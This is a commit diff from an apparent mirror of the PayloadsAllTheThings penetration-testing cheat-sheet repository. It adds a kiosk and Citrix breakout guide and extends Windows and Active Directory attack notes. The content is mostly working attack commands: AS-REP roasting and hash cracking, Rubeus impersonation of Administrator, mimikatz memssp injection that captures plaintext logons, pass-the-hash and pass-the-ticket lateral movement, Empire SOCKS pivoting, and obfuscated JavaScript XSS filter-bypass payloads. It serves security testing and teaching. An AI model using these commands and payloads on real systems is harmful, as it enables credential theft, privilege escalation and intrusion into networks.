mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Application Escape and Breakout
This commit is contained in:
parent
973f091d1b
commit
f7e8f515a5
@ -1126,7 +1126,7 @@ Mitigations:
|
|||||||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||||
|
|
||||||
Prerequisite:
|
Prerequisite:
|
||||||
- Accounts have to have **DONT_REQ_PREAUTH**
|
- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||||
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
|
|||||||
|
|
||||||
# crack AS_REP messages
|
# crack AS_REP messages
|
||||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||||
|
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Mitigations:
|
Mitigations:
|
||||||
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
5. Use Rubeus to get hash from password
|
5. Use Rubeus to get hash from password
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan
|
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
|
||||||
[*] Input password : Weakest123*
|
[*] Input password : Weakest123*
|
||||||
[*] Input username : swktest
|
[*] Input username : swktest$
|
||||||
[*] Input domain : factory.lan
|
[*] Input domain : factory.lan
|
||||||
[*] Salt : FACTORY.LANswktest
|
[*] Salt : FACTORY.LANswktest
|
||||||
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
|
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
|
||||||
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||||
|
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||||
|
|
||||||
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
|
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
|
||||||
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
|
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
|
||||||
|
111
Methodology and Resources/Escape Breakout.md
Normal file
111
Methodology and Resources/Escape Breakout.md
Normal file
@ -0,0 +1,111 @@
|
|||||||
|
# Application Escape and Breakout
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Gaining a command shell](#gaining-a-command-shell)
|
||||||
|
* [Sticky Keys](#explorer---sticky-keys)
|
||||||
|
* [Dialog Boxes](#dialog-boxes)
|
||||||
|
* [Creating new files](#creating-new-files)
|
||||||
|
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
|
||||||
|
* [Exploring Context Menus](#exploring-context-menus)
|
||||||
|
* [Save as](#save-as)
|
||||||
|
* [Input Boxes](#input-boxes)
|
||||||
|
* [Bypass file restrictions](#bypass-file-restrictions)
|
||||||
|
* [Internet Explorer](#internet-explorer)
|
||||||
|
* [Shell URI Handlers](#shell-uri-handlers)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
## Gaining a command shell
|
||||||
|
|
||||||
|
* **Shortcut**
|
||||||
|
* [Window] + [R] -> cmd
|
||||||
|
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
|
||||||
|
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
|
||||||
|
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
|
||||||
|
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
|
||||||
|
* **Task Manager**: `File` > `New Task (Run...)`
|
||||||
|
* **MSPAINT.exe**
|
||||||
|
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
|
||||||
|
* Zoom in to make the following tasks easier
|
||||||
|
* Using the colour picker, set pixels values to (from left to right):
|
||||||
|
* 1st: R: 10, G: 0, B: 0
|
||||||
|
* 2nd: R: 13, G: 10, B: 13
|
||||||
|
* 3rd: R: 100, G: 109, B: 99
|
||||||
|
* 4th: R: 120, G: 101, B: 46
|
||||||
|
* 5th: R: 0, G: 0, B: 101
|
||||||
|
* 6th: R: 0, G: 0, B: 0
|
||||||
|
* Save it as 24-bit Bitmap (*.bmp;*.dib)
|
||||||
|
* Change its extension from bmp to bat and run
|
||||||
|
|
||||||
|
|
||||||
|
## Sticky Keys
|
||||||
|
|
||||||
|
* Spawn the sticky keys dialog
|
||||||
|
* Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
|
||||||
|
* Hit 5 times [SHIFT]
|
||||||
|
* Visit "Ease of Access Center"
|
||||||
|
* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
|
||||||
|
* Start the OSK (On-Screen-Keyboard)
|
||||||
|
* You can now use the keyboard shortcut (CTRL+N)
|
||||||
|
|
||||||
|
## Dialog Boxes
|
||||||
|
|
||||||
|
### Creating new files
|
||||||
|
|
||||||
|
* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
|
||||||
|
* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32`
|
||||||
|
|
||||||
|
## Open a new Windows Explorer instance
|
||||||
|
|
||||||
|
* Right click any folder > select `Open in new window`
|
||||||
|
|
||||||
|
## Exploring Context Menus
|
||||||
|
|
||||||
|
* Right click any file/folder and explore context menus
|
||||||
|
* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
|
||||||
|
|
||||||
|
### Save as
|
||||||
|
|
||||||
|
* "Save as" / "Open as" option
|
||||||
|
* "Print" feature – selecting "print to file" option (XPS/PDF/etc)
|
||||||
|
* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
|
||||||
|
|
||||||
|
### Input Boxes
|
||||||
|
|
||||||
|
Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\`
|
||||||
|
|
||||||
|
|
||||||
|
### Bypass file restrictions
|
||||||
|
|
||||||
|
Enter *.* or *.exe or similar in `File name` box
|
||||||
|
|
||||||
|
## Internet Explorer
|
||||||
|
|
||||||
|
### Download and Run/Open
|
||||||
|
|
||||||
|
* Text files -> opened by Notepad
|
||||||
|
|
||||||
|
### Menus
|
||||||
|
|
||||||
|
* The address bar
|
||||||
|
* Search menus
|
||||||
|
* Help menus
|
||||||
|
* Print menus
|
||||||
|
* All other menus that provide dialog boxes
|
||||||
|
|
||||||
|
## Shell URI Handlers
|
||||||
|
|
||||||
|
* shell:DocumentsLibrary
|
||||||
|
* shell:Librariesshell:UserProfiles
|
||||||
|
* shell:Personal
|
||||||
|
* shell:SearchHomeFolder
|
||||||
|
* shell:System shell:NetworkPlacesFolder
|
||||||
|
* shell:SendTo
|
||||||
|
* shell:Common Administrative Tools
|
||||||
|
* shell:MyComputerFolder
|
||||||
|
* shell:InternetFolder
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
||||||
|
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
@ -138,7 +138,12 @@ or
|
|||||||
|
|
||||||
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
|
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
|
||||||
run autoroute -s 192.168.15.0/24
|
run autoroute -s 192.168.15.0/24
|
||||||
use auxiliary/server/socks4a
|
use auxiliary/server/socks_proxy
|
||||||
|
set SRVPORT 9090
|
||||||
|
set VERSION 4a
|
||||||
|
# or
|
||||||
|
use auxiliary/server/socks4a # (deprecated)
|
||||||
|
|
||||||
|
|
||||||
# Meterpreter list all active routes
|
# Meterpreter list all active routes
|
||||||
run autoroute -p
|
run autoroute -p
|
||||||
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
|
|||||||
route flush
|
route flush
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Empire
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
(Empire) > socksproxyserver
|
||||||
|
(Empire) > use module management/invoke_socksproxy
|
||||||
|
(Empire) > set remoteHost 10.10.10.10
|
||||||
|
(Empire) > run
|
||||||
|
```
|
||||||
|
|
||||||
## sshuttle
|
## sshuttle
|
||||||
|
|
||||||
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
|
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
|
||||||
|
@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||||||
mimikatz # sekurlsa::logonpasswords
|
mimikatz # sekurlsa::logonpasswords
|
||||||
```
|
```
|
||||||
|
|
||||||
- LSA is running as virtualized process (LSAISO) by Credential Guard
|
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||||
```powershell
|
```powershell
|
||||||
# Check if a process called lsaiso.exe exists on the running processes
|
# Check if a process called lsaiso.exe exists on the running processes
|
||||||
tasklist |findstr lsaiso
|
tasklist |findstr lsaiso
|
||||||
|
|
||||||
# If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
|
# Lets inject our own malicious Security Support Provider into memory
|
||||||
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
|
# require mimilib.dll in the same folder
|
||||||
mimikatz # misc::memssp
|
mimikatz # misc::memssp
|
||||||
|
|
||||||
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
|
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
|
||||||
|
@ -7,8 +7,8 @@
|
|||||||
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
|
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
|
||||||
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
|
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [Metasploit - SMB](#metasploit-smb)
|
* [Metasploit - SMB](#metasploit---smb)
|
||||||
* [Metasploit - Psexec](#metasploit-psexec)
|
* [Metasploit - Psexec](#metasploit---psexec)
|
||||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||||
* [WinRM](#winrm)
|
* [WinRM](#winrm)
|
||||||
* [Powershell Remoting](#powershell-remoting)
|
* [Powershell Remoting](#powershell-remoting)
|
||||||
@ -20,6 +20,8 @@
|
|||||||
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
||||||
* [Netuse](#netuse)
|
* [Netuse](#netuse)
|
||||||
* [Runas](#runas)
|
* [Runas](#runas)
|
||||||
|
* [Pass the Ticket](#pass-the-ticket)
|
||||||
|
* [SSH](#ssh)
|
||||||
|
|
||||||
## TIPS
|
## TIPS
|
||||||
|
|
||||||
@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
|
|||||||
set RHOST 10.2.0.3
|
set RHOST 10.2.0.3
|
||||||
set SMBUser username
|
set SMBUser username
|
||||||
set SMBPass password
|
set SMBPass password
|
||||||
|
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
run
|
run
|
||||||
shell
|
shell
|
||||||
@ -123,6 +126,7 @@ Require:
|
|||||||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||||
|
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||||
```
|
```
|
||||||
|
|
||||||
or using a custom ruby code to interact with the WinRM service.
|
or using a custom ruby code to interact with the WinRM service.
|
||||||
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
|
|||||||
|
|
||||||
## Psexec.py / Smbexec.py / Wmiexec.py
|
## Psexec.py / Smbexec.py / Wmiexec.py
|
||||||
|
|
||||||
from Impacket
|
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||||
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
|
|||||||
|
|
||||||
# A semi-interactive shell, used through Windows Management Instrumentation.
|
# A semi-interactive shell, used through Windows Management Instrumentation.
|
||||||
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
|
||||||
|
|
||||||
|
|
||||||
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
||||||
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
||||||
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
|||||||
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Pass the Ticket
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
|
||||||
|
[*] Saving ticket in user.ccache
|
||||||
|
cp user.ccache /tmp/krb5cc_0
|
||||||
|
export KRB5CCNAME=/tmp/krb5cc_0
|
||||||
|
klist
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSH
|
||||||
|
|
||||||
|
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
cp user.ccache /tmp/krb5cc_1045
|
||||||
|
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||||
- [Bypass using Katana](#bypass-using-katana)
|
- [Bypass using Katana](#bypass-using-katana)
|
||||||
|
- [Bypass using Cuneiform](#bypass-using-cuneiform)
|
||||||
- [Bypass using Lontara](#bypass-using-lontara)
|
- [Bypass using Lontara](#bypass-using-lontara)
|
||||||
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
||||||
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
||||||
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
|
|||||||
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass using Cuneiform
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
|
||||||
|
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
|
||||||
|
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
|
||||||
|
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass using Lontara
|
### Bypass using Lontara
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
Loading…
Reference in New Issue
Block a user